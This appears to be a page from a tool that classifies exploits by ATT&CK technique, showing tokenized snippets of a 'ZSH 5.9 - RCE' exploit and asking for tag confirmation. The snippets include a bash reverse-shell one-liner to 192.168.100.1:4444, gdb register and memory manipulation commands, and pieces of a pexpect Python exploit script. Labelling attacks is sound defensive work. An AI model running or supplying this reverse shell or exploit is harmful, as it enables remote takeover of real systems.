[local] ZSH 5.9 - RCE
ATT&CK techniques detected
T1059.004Unix Shell
81%
“bash - i > & / dev / tcp / 192. 168. 100. 1 / 4444 0 > & 1 \ \ " " ', b ' set { long } 0x7fffffffd868 = 0x7ffff7cc9110 ', b ' set $ rdi = 0x555555659000 ', b ' set $ rsp = $ rsp - 8 ', b ' continue ', b ' set { long } $ rsp = 0x55555555a000 ', b ' set $ rip = 0x7ffff7cc9110 ', b …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.004Unix Shell
60%
“[ local ] zsh 5. 9 - rce zsh 5. 9 - rce # exploit zsh 5. 9 - rce # date : 30 - 12 - 2025 # exploit author : sinanadilrana import pexpect import sys import time def debug _ print ( msg ) : print ( f " [ debug ] { msg } " ) def return _ to _ gdb ( gdb, max _ attempts = 3, timeout =…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1622Debugger Evasion
43%
“] : # found either pwndbg > or ( gdb ) prompt debug _ print ( " successfully returned to gdb " ) return true except pexpect. eof : debug _ print ( " session ended unexpectedly " ) return false debug _ print ( f " attempt { attempt + 1 } failed, retrying... " ) debug _ print ( " f…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
ZSH 5.9 - RCE